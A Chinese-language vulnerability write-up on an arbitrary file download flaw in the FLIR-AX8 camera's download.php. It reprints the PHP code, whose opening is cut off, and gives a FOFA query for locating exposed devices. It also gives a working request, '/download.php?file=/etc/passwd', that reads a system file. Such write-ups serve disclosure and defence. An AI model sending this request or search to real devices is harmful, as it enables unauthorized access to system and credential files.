# FLIR-AX8 download.php 任意文件下载
## 漏洞描述
FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
## 漏洞影响
> FLIR-AX8
## FOFA
> app=”FLIR-FLIR-AX8″
## 漏洞复现
出现漏洞的文件为 **download.php**
“`php
“application/octet-stream”,
“zip” => “application/zip”,
“mp3” => “audio/mpeg”,
“mpg” => “video/mpeg”,
“avi” => “video/x-msvideo”,
);
$ctype = isset($content_types[$file_ext]) ? $content_types[$file_ext] : $ctype_default;
header(“Content-Type: ” . $ctype);
//check if http_range is sent by browser (or download manager)
if(isset($_SERVER[‘HTTP_RANGE’]))
{
list($size_unit, $range_orig) = explode(‘=’, $_SERVER[‘HTTP_RANGE’], 2);
if ($size_unit == ‘bytes’)
{
//multiple ranges could be specified at the same time, but for simplicity only serve the first range
//http://tools.ietf.org/id/draft-ietf-http-range-retrieval-00.txt
list($range, $extra_ranges) = explode(‘,’, $range_orig, 2);
}
else
{
$range = ”;
header(‘HTTP/1.1 416 Requested Range Not Satisfiable’);
exit;
}
}
else
{
$range = ”;
}
//figure out download piece from range (if set)
list($seek_start, $seek_end) = explode(‘-‘, $range, 2);
ob_clean();
//set start and end based on range (if set), else set defaults
//also check for invalid ranges.
$seek_end = (empty($seek_end)) ? ($file_size – 1) : min(abs(intval($seek_end)),($file_size – 1));
$seek_start = (empty($seek_start) || $seek_end < abs(intval($seek_start))) ? 0 : max(abs(intval($seek_start)),0); //Only send partial content header if downloading a piece of the file (IE workaround)
if ($seek_start > 0 || $seek_end < ($file_size - 1))
{
header('HTTP/1.1 206 Partial Content');
header('Content-Range: bytes '.$seek_start.'-'.$seek_end.'/'.$file_size);
header('Content-Length: '.($seek_end - $seek_start + 1));
}
else
header("Content-Length: $file_size"); header('Accept-Ranges: bytes'); set_time_limit(0);
fseek($file, $seek_start); while(!feof($file))
{
print(@fread($file, 1024*8));
ob_flush();
flush();
if (connection_status()!=0)
{
@fclose($file);
exit;
}
} // file save was a success
@fclose($file);
exit;
}
else
{
// file couldn't be opened
header("HTTP/1.0 500 Internal Server Error");
exit;
}
}
else
{
// file does not exist
header("HTTP/1.0 404 Not Found");
exit;
}
?>
“`
简单审计可以发现 file参数 为可控参数且没有过滤参数,导致可以下载任意文件
“`
/download.php?file=/etc/passwd
“`
![fl-1](/static/qingy/FLIR-AX8_download.php_任意文件下载/img/fl-1.png)
请登录后查看评论内容